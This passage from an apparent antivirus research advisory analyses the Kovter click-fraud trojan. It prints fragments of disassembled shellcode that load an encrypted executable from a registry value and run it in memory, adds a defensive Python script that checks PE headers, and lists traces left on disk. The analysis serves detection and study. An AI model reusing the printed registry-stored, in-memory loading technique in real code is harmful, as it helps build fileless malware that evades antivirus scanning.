seg000:0000049D                 push    0
seg000:0000049F                 mov     eax, [ebp-84h]  ;  'software\hpkxvramhp',0
seg000:000004A5                 add     eax, 41h ; 'A'  ; eax -> jpmyhhqq
seg000:000004A8                 push    eax
seg000:000004A9                 mov     eax, [ebp-90h]
seg000:000004AF                 push    eax
seg000:000004B0                 call    dword ptr [RegQueryValueEx]
seg000:000004B3                 test    eax, eax
seg000:000004B5                 jnz     short loc_4000513
seg000:000004B7                 cmp     dword ptr [ebp-0A0h], 64h ; 'd'
seg000:000004BE                 jbe     short loc_4000513
seg000:000004C0                 push    40h ; '@'
seg000:000004C2                 push    3000h
seg000:000004C7                 mov     eax, [ebp-0A0h]
seg000:000004CD                 push    eax
seg000:000004CE                 push    0
seg000:000004D0                 call    dword ptr [VirtualAlloc]  
seg000:000004D3                 mov     [ebp-9Ch], eax       
seg000:000004D9                 cmp     dword ptr [ebp-9Ch], 0
seg000:000004E0                 jz      short loc_4000513
seg000:000004E2                 lea     eax, [ebp-0A0h]
seg000:000004E8                 push    eax
seg000:000004E9                 mov     eax, [ebp-9Ch]
seg000:000004EF                 push    eax
seg000:000004F0                 lea     eax, [ebp-94h]
seg000:000004F6                 push    eax
seg000:000004F7                 push    0
seg000:000004F9                 mov     eax, [ebp-84h]
seg000:000004FF                 add     eax, 41h ; 'A'  ; eax -> jpmyhhqq
seg000:00000502                 push    eax
seg000:00000503                 mov     eax, [ebp-90h]  ; hkey
seg000:00000509                 push    eax
seg000:0000050A                 call    dword ptr [RegQueryValueEx] 

[..]

seg000:00000A20                 mov     eax, [ebp-30h]
seg000:00000A23                 mov     eax, [eax+28h]   ; entry point of the file
seg000:00000A26                 add     eax, [ebp-8]
seg000:00000A29                 mov     [ebp-0Ch], eax  ; image + entrypoint
seg000:00000A2C                 xor     eax, eax
seg000:00000A2E                 push    eax
seg000:00000A2F                 push    1
seg000:00000A31                 push    dword ptr [ebp-8]  
seg000:00000A34                 call    dword ptr [ebp-0Ch] ; jumps to the entry point
seg000:00000A37
seg000:00000A37 loc_4000A37:                            ; CODE XREF: seg000:00000757j
seg000:00000A37                                         ; seg000:00000775j ...
seg000:00000A37                 push    0
seg000:00000A39                 call    dword ptr [ExitProcess]
seg000:00000A3C                 pop     edi
seg000:00000A3D                 pop     esi
seg000:00000A3E                 pop     ebx
seg000:00000A3F                 mov     esp, ebp
seg000:00000A41                 pop     ebp
seg000:00000A42                 retn    4

[..]
seg000:00000A48 aSoftwareHpkxvr db 'software\hpkxvramhp',0
[..]
seg000:00000A89 aJpmyhhqq       db 'jpmyhhqq',0
[..]
seg000:00000B2C                 push    ebp
seg000:00000B2D                 mov     ebp, esp
seg000:00000B2F                 pusha
seg000:00000B30
seg000:00000B30 loc_4000B30:
seg000:00000B30                 mov     edi, [ebp+8]
seg000:00000B33                 mov     esi, [ebp+0Ch]
seg000:00000B36                 mov     ecx, [ebp+10h]
seg000:00000B39                 rep movsb
seg000:00000B3B                 popa
seg000:00000B3C                 pop     ebp
seg000:00000B3D                 retn    0Ch
[..]


The machine code of Kovter's thread performs the following operations:
  • it resolves the addresses of the APIs LoadLibrary, GetProcAddress, VirtualAlloc, RegOpenKeyEx and RegQueryValueEx
  • it reads the registry value HKCU\software\hpkxvramhp [jpmyhhqq] into a memory buffer allocated with VirtualAlloc
  • the contents of HKCU\software\hpkxvramhp [jpmyhhqq] are encrypted; after decrypting them it checks whether the result is an executable file (MZ)
  • after a series of operations that rebuild the executable in memory, its code is executed by calling its EntryPoint
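The checks the shellcode performs on the decrypted buffer (cmp word ptr [eax], 'ZM'; e_lfanew read at offset 3Ch; cmp dword ptr [eax], 'EP'; AddressOfEntryPoint read at PE+28h) are the standard PE header checks, and the same checks let an analyst confirm whether a blob pulled from a registry value is a PE image. As an added example, not code from the original post, the following Python script validates those fields at any offset of a blob and reports the header values a loader needs. The blob is built from a constructed minimal PE32 header and is made up; the decryption step is not covered because the post does not describe the cipher.

```python
import struct

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\0\0"
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def parse_pe_header(blob: bytes, offset: int = 0):
    """Validate a PE image starting at `offset` with the same checks as the shellcode
    ('MZ' at 0, e_lfanew at 0x3C, 'PE\\0\\0' there, AddressOfEntryPoint at PE+0x28) and
    return the header fields a loader needs, or None if any check fails."""
    if blob[offset:offset + 2] != IMAGE_DOS_SIGNATURE or len(blob) < offset + 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", blob, offset + 0x3C)[0]
    pe = offset + e_lfanew
    if e_lfanew < 0x40 or len(blob) < pe + 0x54 or blob[pe:pe + 4] != IMAGE_NT_SIGNATURE:
        return None
    machine, n_sections = struct.unpack_from("<HH", blob, pe + 4)
    size_of_optional = struct.unpack_from("<H", blob, pe + 0x14)[0]
    magic = struct.unpack_from("<H", blob, pe + 0x18)[0]
    if magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", blob, pe + 0x34)[0]
    elif magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", blob, pe + 0x30)[0]
    else:
        return None
    entry_rva = struct.unpack_from("<I", blob, pe + 0x28)[0]   # the field read at [eax+28h]
    size_of_image = struct.unpack_from("<I", blob, pe + 0x50)[0]
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,
        "sections": n_sections,
        "size_of_optional_header": size_of_optional,
        "pe32plus": magic == PE32PLUS_MAGIC,
        "entry_rva": entry_rva,
        "image_base": image_base,
        "size_of_image": size_of_image,
    }


def find_embedded_pe(blob: bytes):
    """Scan a blob (e.g. a decrypted registry value) for the first offset at which a
    structurally valid PE header begins; return (offset, header) or None."""
    pos = blob.find(IMAGE_DOS_SIGNATURE)
    while pos != -1:
        info = parse_pe_header(blob, pos)
        if info is not None:
            return pos, info
        pos = blob.find(IMAGE_DOS_SIGNATURE, pos + 1)
    return None


def build_sample_pe32_header() -> bytes:
    """Constructed minimal PE32 header (DOS header, NT signature, file header and optional
    header only, no sections); it is not a real executable."""
    dos = bytearray(0x40)
    dos[0:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    file_header = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0x00, PE32_MAGIC)
    struct.pack_into("<I", optional, 0x10, 0x1000)                # AddressOfEntryPoint
    struct.pack_into("<I", optional, 0x1C, 0x400000)              # ImageBase
    struct.pack_into("<I", optional, 0x38, 0x5000)                # SizeOfImage
    return bytes(dos) + IMAGE_NT_SIGNATURE + file_header + bytes(optional)


# Constructed registry-value contents: 13 bytes of padding, then the header.
SAMPLE_BLOB = b"\x00" * 13 + build_sample_pe32_header()

if __name__ == "__main__":
    print(find_embedded_pe(SAMPLE_BLOB))
```

Scanning at every 'MZ' rather than only at offset 0 matters in practice, because a stored payload is often prefixed by a length field, a key or junk bytes; the header checks reject accidental 'MZ' pairs because a random e_lfanew almost never lands on a 'PE\0\0' signature.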

Final remarks

Kovter is a click-fraud trojan that uses several layers of obfuscation (JavaScript, PowerShell, machine code) and "fileless" techniques, so as not to be caught by the antivirus scan of the disk. Kovter's viral code is held in the Windows registry, inside a randomly named key under HKCU\Software.

This malware does leave some traces on disk: the .lnk files used to run it automatically (through the Startup folder and the HKCU\..\Run registry key). Moreover, reading the HKCU\..\Run registry key with Regedit reports an error, which can alert the user to the presence of this malware.
 

Author: Ing. Gianfranco Tonello



Any information published on our site may be used and republished on other websites, blogs, forums, Facebook and/or in any other form, both in print and electronically, provided that the source is always explicitly cited as "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" with a clickable link to the original advisory and/or web page from which the text, ideas and/or images were taken.

When the C.R.A.M. by TG Soft www.tgsoft.it advisory is used in summary articles, the following acknowledgement would be appreciated: "We thank the Centro Ricerche Anti-Malware C.R.A.M. by TG Soft; the direct link to the original advisory is: [direct clickable link]".
